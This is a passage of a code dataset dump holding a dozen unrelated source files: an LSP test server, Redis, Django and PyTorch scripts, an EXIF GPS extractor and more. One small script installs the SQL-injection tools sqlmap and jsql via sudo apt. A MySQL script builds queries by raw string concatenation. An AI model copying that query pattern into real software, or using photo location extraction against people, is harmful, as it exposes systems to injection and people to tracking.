not isinstance(param, dict) or 'method' not in param or 'response' not in param:\n raise Error(ErrorCode.InvalidParams, 'expected a response object to have a method and params keys')\n\n self._responses.extend([(param['method'], param['response']) for param in params])\n return None\n\n async def _send_notification(self, params: PayloadLike) -> PayloadLike:\n method, payload = self._validate_request_params(params)\n self._notify(method, payload)\n return None\n\n async def _get_received(self, params: PayloadLike) -> PayloadLike:\n method, payload = self._validate_request_params(params)\n async with self._received_cv:\n while True:\n try:\n return self._received.pop(method)\n except KeyError:\n pass\n await self._received_cv.wait()\n\n async def _fake_request(self, params: PayloadLike) -> PayloadLike:\n method, payload = self._validate_request_params(params)\n return await self.request(method, payload)\n\n def _validate_request_params(self, params: PayloadLike) -> Tuple[str, Optional[Union[Dict, List]]]:\n if not isinstance(params, dict):\n raise Error(ErrorCode.InvalidParams, \"expected params to be a dictionary\")\n if \"method\" not in params:\n raise Error(ErrorCode.InvalidParams, 'expected \"method\" key')\n if not isinstance(params[\"method\"], str):\n raise Error(ErrorCode.InvalidParams, 'expected \"method\" key to be a string')\n return (params[\"method\"], params.get('params'))\n\n async def _initialize(self, params: PayloadLike) -> PayloadLike:\n if not isinstance(params, dict):\n raise Error(ErrorCode.InvalidParams,\n \"expected params to be a dictionary\")\n init_options = params.get(\"initializationOptions\", {})\n if not isinstance(init_options, dict):\n raise Error(ErrorCode.InvalidParams,\n \"expected initializationOptions to be a dictionary\")\n return init_options.get(\"serverResponse\", {})\n\n async def _shutdown(self, params: PayloadLike) -> PayloadLike:\n if params is not None:\n raise Error(ErrorCode.InvalidParams, \"expected shutdown params to be null\")\n self._received_shutdown = True\n return None\n\n async def _on_exit(self, params: PayloadLike) -> None:\n if params is not None:\n raise Error(ErrorCode.InvalidParams, \"expected exit params to be null\")\n self._reader.set_exception(StopLoopException())\n\n\n# START: https://stackoverflow.com/a/52702646/990142\nasync def stdio() -> Tuple[asyncio.StreamReader, asyncio.StreamWriter]:\n loop = asyncio.get_event_loop()\n if sys.platform == 'win32':\n return _win32_stdio(loop)\n else:\n return await _unix_stdio(loop)\n\n\nasync def _unix_stdio(loop: asyncio.AbstractEventLoop) -> Tuple[asyncio.StreamReader, asyncio.StreamWriter]:\n reader = asyncio.StreamReader(loop=loop)\n\n def reader_factory() -> asyncio.StreamReaderProtocol:\n return asyncio.StreamReaderProtocol(reader)\n\n def writer_factory() -> asyncio.streams.FlowControlMixin:\n return asyncio.streams.FlowControlMixin()\n\n await loop.connect_read_pipe(reader_factory, sys.stdin)\n pipe = os.fdopen(sys.stdout.fileno(), 'wb')\n writer_transport, writer_protocol = await loop.connect_write_pipe(writer_factory, pipe)\n writer = asyncio.streams.StreamWriter(writer_transport, writer_protocol, None, loop)\n return reader, writer\n\n\ndef _win32_stdio(loop: asyncio.AbstractEventLoop) -> Tuple[asyncio.StreamReader, asyncio.StreamWriter]:\n\n # no support for asyncio stdio yet on Windows, see https://bugs.python.org/issue26832\n # use an executor to read from stdin and write to stdout\n # note: if nothing ever drains the writer explicitly, no flushing ever takes place!\n class Reader:\n\n def __init__(self, loop: asyncio.AbstractEventLoop) -> None:\n self.loop = loop\n self.stdin = sys.stdin.buffer\n self.__exception: Optional[Exception] = None\n\n def at_eof(self) -> bool:\n return self.__exception is not None\n\n def set_exception(self, exception: Exception) -> None:\n self.__exception = exception\n\n def __check(self) -> None:\n if self.__exception is not None:\n raise self.__exception\n\n async def readline(self) -> bytes:\n self.__check()\n # a single call to sys.stdin.readline() is thread-safe\n return await self.loop.run_in_executor(None, self.stdin.readline)\n\n async def readexactly(self, n: int) -> bytes:\n self.__check()\n return await self.loop.run_in_executor(None, self.stdin.read, n)\n\n class Writer:\n\n def __init__(self, loop: asyncio.AbstractEventLoop) -> None:\n self.loop = loop\n self.buffer: List[bytes] = []\n self.stdout = sys.stdout.buffer\n\n def write(self, data: bytes) -> None:\n self.buffer.append(data)\n\n def writelines(self, lines: Iterable[bytes]) -> None:\n self.buffer.extend(lines)\n\n async def drain(self) -> None:\n data, self.buffer = self.buffer, []\n\n def do_blocking_drain() -> None:\n self.stdout.write(b''.join(data))\n self.stdout.flush()\n\n await self.loop.run_in_executor(None, do_blocking_drain)\n\n return Reader(loop), Writer(loop) # type: ignore\n# END: https://stackoverflow.com/a/52702646/990142\n\n\nasync def main(tcp_port: Optional[int] = None) -> bool:\n if tcp_port is not None:\n\n class ClientConnectedCallback:\n\n def __init__(self) -> None:\n self.received_shutdown = False\n\n async def __call__(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:\n session = Session(reader, writer)\n self.received_shutdown = await session.run_forever()\n\n callback = ClientConnectedCallback()\n server = await asyncio.start_server(callback, port=tcp_port)\n # NOTE: This is deliberately wrong -- we should stop serving once the exit notification is received.\n # But, it's good to have this botched logic here to make sure that servers shutdown in the integration tests.\n await server.serve_forever()\n return callback.received_shutdown\n else:\n reader, writer = await stdio()\n session = Session(reader, writer)\n return await session.run_forever()\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(prog=__package__, description=__doc__)\n parser.add_argument(\"-v\", \"--version\", action=\"store_true\", help=\"print version and exit\")\n parser.add_argument(\"-p\", \"--tcp-port\", type=int)\n args = parser.parse_args()\n if args.version:\n print(__package__, __version__)\n exit(0)\n loop = asyncio.get_event_loop()\n shutdown_received = False\n try:\n shutdown_received = loop.run_until_complete(main(args.tcp_port))\n except KeyboardInterrupt:\n pass\n loop.run_until_complete(loop.shutdown_asyncgens())\n loop.close()\n exit(0 if shutdown_received else 1)\n","sub_path":"tests/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":19535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"30167661","text":"import redis\nimport sys\n\nf = open(\"output_pmi_clustering.txt\" , \"r\")\nli = []\n\ndiction = {}\nf1 = open(\"../qua.txt\", \"r\")\nfor line in f1:\n\ttemp = line.split(\",\")\n\tdiction[temp[0]] = temp[1]\n\nfor line in f :\n\ttemp = line.split(\"\\t\")\n\ttemp[2] = len(temp[1])\n\tif temp[0] in diction:\n\t\ttemp[0] = diction[temp[0]]\n\tli.append(temp)\t\n\nli = sorted(li, key = lambda x: x[1])\ndic = {}\nchild = {}\nchild[\"\"] = []\nfor temp in li :\n\thold = []\n\ttime = int(len(temp[1]) / 7) \n\tif time == 1 :\n\t\tchild[\"\"].append(temp[1][:time * 7])\n\telse :\n\t\tif time > 1:\n\t\t\tif temp[1][:time * 7 - 7] in child :\n\t\t\t\thold = dic[temp[1][:time * 7 - 7]]\n\t\t\telse :\n\t\t\t\thold = []\n\t\t\thold.append(temp[1][:time * 7])\n\t\t\tdic[temp[1][:time *7 -7]] = hold\n\tif temp[1][:time * 7] in dic :\n\t\thold = dic[temp[1][:time * 7]]\n\telse : hold = []\n\thold.append(temp[0])\n\tdic[temp[1][:time * 7]] = hold\n\nr = redis.Redis(\n\thost = '127.0.0.1',\n\tport = 6379)\n\ndef storeClus(key):\n\thold = []\n\tif key in dic:\n\t\thold = dic[key]\n\telse : return\n\twri = \"w\" + key\n\ttemp = \"\"\n\tfor wor in hold:\n\t\ttemp += wor + \"\\t\"\n\ttemp = temp[:-1]\n\tr.set(wri, temp)\n\ndef storeChild(father):\n\thold = []\n\tstoreClus(father)\n\tif father in child :\n\t\thold = child[father]\t\n\telse : return\n\twri = \"c\" + father\n\ttemp = \"\"\n\tfor ch in hold:\n\t\ttemp += ch + \"\\t\"\n\t\tstoreChild(ch)\n\ttemp = temp[:-1]\n\tr.set(wri, temp)\n\nstoreChild(\"\")\n\n\n#\tfor i in range (1, time + 1):\n#\t\tif temp[1][:i * 7] in dic :\n#\t\t\thold = dic[temp[1][:i * 7]]\n#\t\telse : hold = []\n#\t\thold.append(temp[0])\n#\t\tdic[temp[1][:i * 7]] = hold\n\n\n","sub_path":"hierarchical_build_from_redis.py","file_name":"hierarchical_build_from_redis.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"302516768","text":"from fixture.registration_helper import RegistrationHelper\nfrom driver.transport import Transport\nfrom driver.scaner import Scaner\nfrom fixture.report_helper import ReportHelper\nimport time\n\nclass Application:\n\n def __init__(self, target, scaner_port=None, scaner_boundrate=9600):\n self.transport = Transport(address=target)\n self.scaner = None\n if scaner_port != None:\n self.scaner = Scaner(port=scaner_port, baudrate=scaner_boundrate)\n\n self.frontol_registration = RegistrationHelper(transport=self.transport, scaner=self.scaner)\n self.frontol_report = ReportHelper(transport=self.transport)\n\n def open_main_window(self, have_cassa=True):\n if have_cassa == False:\n\n time.sleep(4)\n self.transport.click_button('~')\n\n self.transport.click_element(window_name='Авторизация доступа', button_name='ОК')\n if self.transport.check_window(window_name='Супервизор') == 0:\n return 0\n else:\n return -1\n\n def close_main_window(self):\n self.scaner.close_port()\n self.transport.click_element(window_name='Супервизор', button_name='Выход в ОС')\n self.transport.click_button('~')","sub_path":"fixture/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"358721862","text":"import os\nimport sys\nimport spotipy\nimport spotipy.oauth2 as oauth2\nimport re\n\nCLI_ID = \"c031db81e9e841c382309dac036c36ae\"\n# CLI_ID = \"6091268a186e4c6996198bf7749090e2\"\nCLI_KEY = os.environ.get(\"spotifyDiscordBotSecret\")\nif CLI_KEY is None:\n print(\"You have not added the spotify Client secret as an environment variable. Exiting.\")\n sys.exit()\n\ndef get_token():\n \"\"\" Returns an access token that is to be sent to the spotify Web API upon every request.\"\"\"\n credentials = oauth2.SpotifyClientCredentials(\n client_id = CLI_ID, \n client_secret = CLI_KEY)\n token = credentials.get_access_token()\n return token \n\ndef extract_playlist_id(playlist_url):\n # If the user passes in an html link\n if playlist_url.startswith(\"https\") or playlist_url.startswith(\"open.spotify\"):\n playlist_id = re.search(\"playlist\\/(.*)\\?\", playlist_url)\n if playlist_id is None:\n playlist_id = playlist_id = re.search(\"playlist\\/(.*)\", playlist_url)\n playlist_id = playlist_id.group(1)\n return playlist_id\n\n # The user passes in a spotify URI \n if playlist_url.startswith(\"spotify:playlist\"):\n playlist_id = re.search(\"playlist:(.*)\", playlist_url).group(1)\n return playlist_id\n \n # Else, the playlist_url is invalid\n return None\n\ndef get_songs_from_album(playlist_url):\n \"\"\" Given an ALBUM_URL, this function will query the spotify API (via the spotipy library) \n and return a list of all the songs present in that album\"\"\"\n \n # First, we must tell the spotify API who we are\n token = get_token()\n spotify = spotipy.Spotify(auth=token)\n playlist_id = extract_playlist_id(playlist_url)\n\n # Return None if the playlist_url was invalid\n if playlist_id is None:\n return None\n\n playlist = spotify.playlist(playlist_id)\n tracks = playlist[\"tracks\"]\n song_artist_lst = list()\n\n for item in tracks[\"items\"]:\n song_name = item[\"track\"][\"name\"]\n artist_name = item[\"track\"][\"artists\"][0][\"name\"]\n song_artist_lst.append((song_name, artist_name))\n\n print(song_artist_lst)\n return song_artist_lst\n\n\n\n\n","sub_path":"discordBot/spotifyExtractor.py","file_name":"spotifyExtractor.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"568854137","text":"import json\nimport jsonschema\n\nfrom django.core.management import call_command\nfrom django.test.client import Client\nfrom jsonschema import validate\nfrom io import StringIO\n\nfrom apps.test import BaseApiTest\n\nfrom .audit_logger_schemas import GLOBAL_STATE_METRICS_LOG_SCHEMA, GLOBAL_STATE_METRICS_PER_APP_LOG_SCHEMA\n\n\nloggers = [\n 'audit.global_state_metrics'\n]\n\n\nclass TestLoggersGlobalMetricsManagementCommand(BaseApiTest):\n\n def setUp(self):\n # Setup the RequestFactory\n self.client = Client()\n self._redirect_loggers(loggers)\n\n def tearDown(self):\n self._cleanup_logger()\n\n def _get_log_content(self, logger_name):\n return self._collect_logs(loggers).get(logger_name)\n\n def _validateJsonSchema(self, schema, content):\n try:\n validate(instance=content, schema=schema)\n except jsonschema.exceptions.ValidationError as e:\n # Show error info for debugging\n print(\"jsonschema.exceptions.ValidationError: \", e)\n return False\n return True\n\n def test_management_command_logging(self):\n # Setup variety of real/synth users, apps and grants to test with using BaseApiTest helper function.\n for i in range(0, 3):\n user, app, ac = self._create_user_app_token_grant(first_name=\"real\",\n last_name=\"smith0\" + str(i),\n fhir_id=\"2000000000000\" + str(i),\n app_name=\"app0\",\n app_username=\"user_app0\")\n for i in range(0, 2):\n user, app, ac = self._create_user_app_token_grant(first_name=\"synth\",\n last_name=\"smith0\" + str(i),\n fhir_id=\"-2000000000000\" + str(i),\n app_name=\"app0\",\n app_username=\"user_app0\")\n for i in range(0, 2):\n user, app, ac = self._create_user_app_token_grant(first_name=\"real\",\n last_name=\"smith1\" + str(i),\n fhir_id=\"2000000000001\" + str(i),\n app_name=\"app1\",\n app_username=\"user_app1\")\n for i in range(0, 3):\n user, app, ac = self._create_user_app_token_grant(first_name=\"synth\",\n last_name=\"smith1\" + str(i),\n fhir_id=\"-2000000000001\" + str(i),\n app_name=\"app1\",\n app_username=\"user_app1\")\n for i in range(0, 5):\n user, app, ac = self._create_user_app_token_grant(first_name=\"real\",\n last_name=\"smith2\" + str(i),\n fhir_id=\"2000000000002\" + str(i),\n app_name=\"app2\",\n app_username=\"user_app2\")\n app.require_demographic_scopes = False\n app.save()\n for i in range(0, 7):\n user, app, ac = self._create_user_app_token_grant(first_name=\"synth\",\n last_name=\"smith2\" + str(i),\n fhir_id=\"-2000000000002\" + str(i),\n app_name=\"app2\",\n app_username=\"user_app2\")\n for i in range(0, 1):\n user, app, ac = self._create_user_app_token_grant(first_name=\"synth\",\n last_name=\"smith2\" + str(i),\n fhir_id=\"-2000000000003\" + str(i),\n app_name=\"app3\",\n app_username=\"user_app3\")\n app.active = False\n app.save()\n\n # Call management command\n call_command(\"log_global_state_metrics\", stdout=StringIO(), stderr=StringIO())\n\n # Get all log entries\n log_content = self._get_log_content('audit.global_state_metrics')\n self.assertIsNotNone(log_content)\n\n # Set buffer to read log lines from\n log_content_buf = StringIO(log_content)\n\n '''\n Validate 1st log line has:\n {'type': 'global_state_metrics',\n 'group_timestamp': '2021-06-11T18:50:14+00:00',\n 'real_bene_cnt': 10,\n 'synth_bene_cnt': 12,\n 'global_apps_active_cnt': 3,\n 'global_apps_inactive_cnt': 1,\n 'global_apps_require_demographic_scopes_cnt': 2}\n '''\n log_line = json.loads(log_content_buf.readline())\n self.assertTrue(self._validateJsonSchema(GLOBAL_STATE_METRICS_LOG_SCHEMA, log_line))\n\n # Per app expected value LISTs\n active_list = [True, True, True, False]\n require_demographic_scopes_list = [True, True, False, True]\n real_bene_cnt_list = [3, 2, 5, 0]\n synth_bene_cnt_list = [2, 3, 7, 1]\n\n # Validate per app log entries\n cnt = 0\n for log_line in log_content_buf.readlines():\n log_dict = json.loads(log_line)\n\n # Update Json Schema\n GLOBAL_STATE_METRICS_PER_APP_LOG_SCHEMA[\"properties\"][\"name\"][\"pattern\"] = \"app{}\".format(cnt)\n GLOBAL_STATE_METRICS_PER_APP_LOG_SCHEMA[\"properties\"][\"active\"][\"enum\"] = [active_list[cnt]]\n GLOBAL_STATE_METRICS_PER_APP_LOG_SCHEMA[\"properties\"][\"require_demographic_scopes\"][\"enum\"] = [\n require_demographic_scopes_list[cnt]\n ]\n GLOBAL_STATE_METRICS_PER_APP_LOG_SCHEMA[\"properties\"][\"real_bene_cnt\"][\"enum\"] = [real_bene_cnt_list[cnt]]\n GLOBAL_STATE_METRICS_PER_APP_LOG_SCHEMA[\"properties\"][\"synth_bene_cnt\"][\"enum\"] = [synth_bene_cnt_list[cnt]]\n\n # Validate with schema\n self.assertTrue(self._validateJsonSchema(GLOBAL_STATE_METRICS_PER_APP_LOG_SCHEMA, log_dict))\n cnt = cnt + 1\n","sub_path":"apps/logging/tests/test_loggers_management_command.py","file_name":"test_loggers_management_command.py","file_ext":"py","file_size_in_byte":6707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"115589000","text":"import webbrowser\nfrom PIL import Image\nfrom PIL.ExifTags import *\n\n\ndef get_exif(fn):\n print('[ + ]' + 'Проверка Metadata...' + '\\n')\n try:\n i = Image.open(fn)\n except IOError:\n print(\"Error: Файл не найден\")\n return -1\n\n info = i._getexif()\n if not info:\n print(\"Метаданные не очень информативны:\")\n return -1\n\n ret = {}\n for tag, value in info.items():\n decoded = TAGS.get(tag, tag)\n ret[decoded] = value\n\n return ret\n\n\ndef gps_analyzer(img_path):\n exif_data = get_exif(img_path)\n\n if exif_data == -1:\n return\n\n for x, y in exif_data.items():\n print(f\"{x} : {y}\")\n\n gps_info = exif_data.get(\"GPSInfo\")\n\n if gps_info:\n lat = [float(x) / float(y) for x, y in gps_info[2]]\n latref = gps_info[1]\n\n lon = [float(x) / float(y) for x, y in gps_info[4]]\n lonref = gps_info[3]\n\n lat = lat[0] + lat[1] / 60 + lat[2] / 3600\n lon = lon[0] + lon[1] / 60 + lon[2] / 3600\n if latref == 'S':\n lat = -lat\n if lonref == 'W':\n lon = -lon\n\n map_it(lat, lon)\n\n else:\n print('')\n print(\"GPS локация не найдена\")\n\n\ndef map_it(lat, lon):\n # Prints latitude and longitude values\n print()\n print(f\"Accurate Latitude : {lat}\")\n print(f\"Accurate Longitude : {lon}\")\n print()\n # Prompts the user to launch a web browser with the map\n query = f\"{lat},+{lon}\"\n maps_url = f\"https://maps.google.com/maps?q={query}\"\n\n openWeb = input(\"Open GPS location in web browser? (Y/N) \")\n if openWeb.upper() == 'Y':\n webbrowser.open(maps_url, new=2)\n","sub_path":"plugins/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"476209197","text":"#to install database assement tools\n#BY KAUNG KHANT ZAW\nimport os\nimport sys\nprint (''' /$$$$$$ \n /$$___$$ \n| $$ \\ $$ /$$$$$$$ /$$$$$$$$ /$$$$$$ /$$$$$$$ \n| $$$$$$$$ /$$_____/|____ /$$/ /$$__ $$| $$__ $$\n| $$__ $$| $$$$$$ /$$$$/ | $$ \\ $$| $$ \\ $$\n| $$ | $$ \\____ $$ /$$__/ | $$ | $$| $$ | $$\n| $$ | $$ /$$$$$$$/ /$$$$$$$$| $$$$$$/| $$ | $$\n|__/ |__/|_______/ |________/ \\______/ |__/ |__/''')\nprint (\"BY KAUNG KHANT ZAW\")\ndef fuc():\n print ('''1. JSQL 2. SQLMAP 3. sqlite\n4. TO ALL PROGRAMS\n0. EXIT PROGRAM''')\n global num_num\n num_num = int(input('kali>>> '))\n if num_num == 1:\n os.system('sudo apt install jsql')\n elif num_num == 2:\n os.system('sudo apt install sqlmap')\n elif num_num == 3:\n os.system('sudo apt install sqlite')\n elif num_num == 4:\n os.system('sudo apt install jsql sqlmap sqlite')\n elif num_num == 0:\n exit()\n else:\n print('Invalid...')\nwhile True:\n fuc()\nelse:\n exit()\n","sub_path":"programs/database_assement.py","file_name":"database_assement.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"517042346","text":"a = 10000\nprint(a)\nb = 10\nprint(b)\na = a+b\nprint(a)\nprint(b)\n\ndef AA(n):\n aa = 1+1+n\n return aa\n\ndef BB(n):\n bb = n*3\n return bb\n\nif __name__ == '__main__':\n print('test mode')\n","sub_path":"python_test.py","file_name":"python_test.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"12214603","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nprint(\"hello\")\n\n\n# %%\nimport torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision import transforms\nimport torch.utils.data as data\n\n\n# %%\ntrain_data_path = \"./train\"\ntransform = transforms.Compose([\n transforms.Resize((64, 64)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], \n std=[0.229, 0.224, 0.225])\n])\n\ntrain_data = torchvision.datasets.ImageFolder(root=train_data_path, transform=transform)\n\n\n# %%\ntransform\n\n\n# %%\nval_data_path = \"./val/\"\nval_data = torchvision.datasets.ImageFolder(root=val_data_path, transform=transform)\n\ntest_data_path = \"./test/\"\ntest_data = torchvision.datasets.ImageFolder(root=test_data_path, transform=transform)\n\n\n# %%\nbatch_size = 64\ntrain_data_loader = data.DataLoader(train_data, batch_size=batch_size)\nval_data_loader = data.DataLoader(val_data, batch_size=batch_size)\ntest_data_loader = data.DataLoader(test_data, batch_size=batch_size)\n\n\n# %%\nimage, label = next(iter(train_data_loader))\n\n\n# %%\nimage.shape, label.shape\n\n\n# %%\nclass SimpleNet(nn.Module):\n def __init__(self):\n super(SimpleNet, self).__init__()\n self.fc1 = nn.Linear(12288, 84)\n self.fc2 = nn.Linear(84, 50)\n self.fc3 = nn.Linear(50, 2)\n\n def forward(self, x):\n x = x.view(-1, 12288)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n \n\n\n# %%\nsimplenet = SimpleNet()\n\n\n# %%\nsimplenet\n\n\n# %%\nimport torch.optim as optim\noptimizer = optim.Adam(simplenet.parameters(), lr=0.001)\n\n\n# %%\nif torch.cuda.is_available():\n device = torch.device(\"cuda\")\nelse:\n device = torch.device(\"cpu\")\n\n# model.to(device)\n\n\n# %%\ndevice\n\n\n# %%\ndef train(model, optimizer, loss_fn, train_loader, val_loader, epochs=20, device=\"cpu\"):\n print(device)\n for epoch in range(epochs):\n training_loss = 0.0\n valid_loss = 0.0\n model.train()\n\n for batch in train_loader:\n optimizer.zero_grad()\n input, target = batch\n input = input.to(device)\n target = target.to(device)\n\n output = model(input)\n\n loss = loss_fn(output, target)\n loss.backward()\n optimizer.step()\n\n training_loss += loss.data.item()\n training_loss /= len(train_loader)\n\n model.eval()\n num_correct = 0\n num_examples = 0\n\n for batch in val_loader:\n input, target = batch\n input = input.to(device)\n output = model(input)\n\n target = target.to(device)\n\n loss = loss_fn(output, target)\n valid_loss += loss.data.item()\n\n correct = torch.eq(torch.max(F.softmax(output), dim=1)[1],\n\t\t\t\t\t\t\t target).view(-1)\n\n num_correct += torch.sum(correct).item()\n num_examples += correct.shape[0]\n\n valid_loss /= len(val_loader)\n\n print(\"Epoch: {}, Training Loss: {:.2f}, Validation Loss: {:.2f}, accuracy = {:.2f}\".format(epoch, training_loss,\n valid_loss, num_correct / num_examples))\n\n\n# %%\ndevice\n\n\n# %%\ntrain(simplenet, optimizer, torch.nn.CrossEntropyLoss(),train_data_loader, val_data_loader, 20, device)\n\n\n# %%\n\n\n\n# %%\n\n\n","sub_path":"chapter2/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"28298900","text":"# -*- coding: utf-8 -*-\n# pragma pylint: disable=unused-argument, no-self-use\n\"\"\"Function implementation\n test with: resilient-circuits selftest -l fn_proofpoint_campaign\n\"\"\"\n\nimport logging\nimport os\nimport requests\nfrom requests.auth import HTTPBasicAuth\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.INFO)\nlog.addHandler(logging.StreamHandler())\n\n\ndef get_config_option(option_name, opts, optional=False):\n \"\"\"Given option_name, check if it is in appconfig.\n Raises ValueError if it is missing and mandatory.\n \"\"\"\n option = opts.get(option_name)\n\n if not option and not optional:\n err = '\"{0}\" is mandatory and not set in the app.config file.'.format(option_name)\n raise ValueError(err)\n else:\n return option\n\n\ndef selftest_function(opts):\n \"\"\"\n Placeholder for selftest function. An example use would be to test package api connectivity.\n Suggested return values are be unimplemented, success, or failure.\n \"\"\"\n options = opts.get('fn_proofpoint', {})\n\n base_url = get_config_option('base_url', options)\n username = get_config_option('username', options)\n password = get_config_option('password', options)\n cafile = options.get('cafile')\n bundle = os.path.expanduser(cafile) if cafile else False\n\n basic_auth = HTTPBasicAuth(username, password)\n url = '{0}/bad'.format(base_url)\n\n try:\n res = requests.get(\n url,\n auth=basic_auth,\n verify=bundle\n )\n\n res.raise_for_status()\n\n if res.status_code == 200:\n return {'state': 'success'}\n\n return {\n 'state': 'failure',\n 'reason': 'status code {0}'.format(res.status_code)\n }\n\n except Exception as ex:\n log.error(ex)\n return {\n 'state': 'failure',\n 'reason': ex\n }\n","sub_path":"fn_proofpoint/fn_proofpoint/util/selftest.py","file_name":"selftest.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"41919159","text":"# Copyright 2017 Red Hat, Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom flask import render_template, Blueprint, current_app, redirect, url_for\nfrom ara import models, utils\n\nreports = Blueprint('reports', __name__)\n\n\n@reports.route('/')\n@reports.route('/')\ndef report_list(page=1):\n if current_app.config['ARA_PLAYBOOK_OVERRIDE'] is not None:\n override = current_app.config['ARA_PLAYBOOK_OVERRIDE']\n playbooks = (models.Playbook.query\n .filter(models.Playbook.id.in_(override))\n .order_by(models.Playbook.time_start.desc()))\n else:\n playbooks = (models.Playbook.query\n .order_by(models.Playbook.time_start.desc()))\n\n if not playbooks.count():\n return redirect(url_for('home.main'))\n\n playbook_per_page = current_app.config['ARA_PLAYBOOK_PER_PAGE']\n # Paginate unless playbook_per_page is set to 0\n if playbook_per_page >= 1:\n playbooks = playbooks.paginate(page, playbook_per_page, False)\n else:\n playbooks = playbooks.paginate(page, None, False)\n\n stats = utils.get_summary_stats(playbooks.items, 'playbook_id')\n\n result_per_page = current_app.config['ARA_RESULT_PER_PAGE']\n\n return render_template('report_list.html',\n active='reports',\n result_per_page=result_per_page,\n playbooks=playbooks,\n stats=stats)\n","sub_path":"ara/views/reports.py","file_name":"reports.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"349210071","text":"from __future__ import print_function\r\nimport re\r\n\r\nfrom datetime import date, datetime, timedelta\r\nimport mysql.connector\r\n\r\nvalues=[]\r\n\r\n\r\nwith open ('save4.txt', 'r') as f:\r\n for rec in f:\r\n a= (rec.split(': ')[1])\r\n values.append(a)\r\n\r\nfor word in values:\r\n print (word)\r\n\r\ncnx = mysql.connector.connect(user='root',password = 'root', database='dbname')\r\ncursor = cnx.cursor()\r\n\r\nquery = \"INSERT INTO adas VALUES (\"\r\n\r\nwordLed=len(values)\r\nfor i in range(0,wordLed):\r\n #query = query + \"',\"\r\n query = query + values[i]\r\n\r\nquery = query + \")\"\r\n\r\nquery = (query.split('}')[0])\r\nquery= query+\")\"\r\n\r\nprint(query)\r\n\r\ncursor.execute(query)\r\n\r\n\r\n# Make sure data is committed to the database\r\ncnx.commit()\r\ncursor.close()\r\ncnx.close()\r\n\r\n\r\n","sub_path":"dbsingal.py","file_name":"dbsingal.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"289496033","text":"from __future__ import division, unicode_literals, print_function\n\nimport math\nimport itertools\nfrom operator import itemgetter\n\nimport numpy as np\nfrom scipy.stats import gaussian_kde\nfrom pymatgen.analysis.diffraction.xrd import XRDCalculator\nfrom pymatgen.analysis.local_env import ValenceIonicRadiusEvaluator\nfrom pymatgen.core.periodic_table import Specie, Element\nfrom pymatgen.symmetry.analyzer import SpacegroupAnalyzer\n\nfrom matminer.featurizers.base import BaseFeaturizer\n\n\nclass RadialDistributionFunction(BaseFeaturizer):\n \"\"\"\n Calculate the radial distribution function (RDF) of a crystal structure.\n\n Features:\n - Radial distribution function\n\n Args:\n cutoff: (float) distance up to which to calculate the RDF.\n bin_size: (float) size of each bin of the (discrete) RDF.\n \"\"\"\n\n def __init__(self, cutoff=20.0, bin_size=0.1):\n self.cutoff = cutoff\n self.bin_size = bin_size\n\n def featurize(self, s):\n \"\"\"\n Get RDF of the input structure.\n Args:\n s (Structure): Pymatgen Structure object.\n\n Returns:\n rdf, dist: (tuple of arrays) the first element is the\n normalized RDF, whereas the second element is\n the inner radius of the RDF bin.\n \"\"\"\n if not s.is_ordered:\n raise ValueError(\"Disordered structure support not built yet\")\n\n # Get the distances between all atoms\n neighbors_lst = s.get_all_neighbors(self.cutoff)\n all_distances = np.concatenate(\n tuple(map(lambda x: [itemgetter(1)(e) for e in x], neighbors_lst)))\n\n # Compute a histogram\n dist_hist, dist_bins = np.histogram(\n all_distances, bins=np.arange(\n 0, self.cutoff + self.bin_size, self.bin_size), density=False)\n\n # Normalize counts\n shell_vol = 4.0 / 3.0 * math.pi * (np.power(\n dist_bins[1:], 3) - np.power(dist_bins[:-1], 3))\n number_density = s.num_sites / s.volume\n rdf = dist_hist / shell_vol / number_density\n return [{'distances': dist_bins[:-1], 'distribution': rdf}]\n\n def feature_labels(self):\n return [\"radial distribution function\"]\n\n def citations(self):\n return []\n\n def implementors(self):\n return [\"Saurabh Bajaj\"]\n\n\nclass PartialRadialDistributionFunction(BaseFeaturizer):\n \"\"\"\n Compute the partial radial distribution function 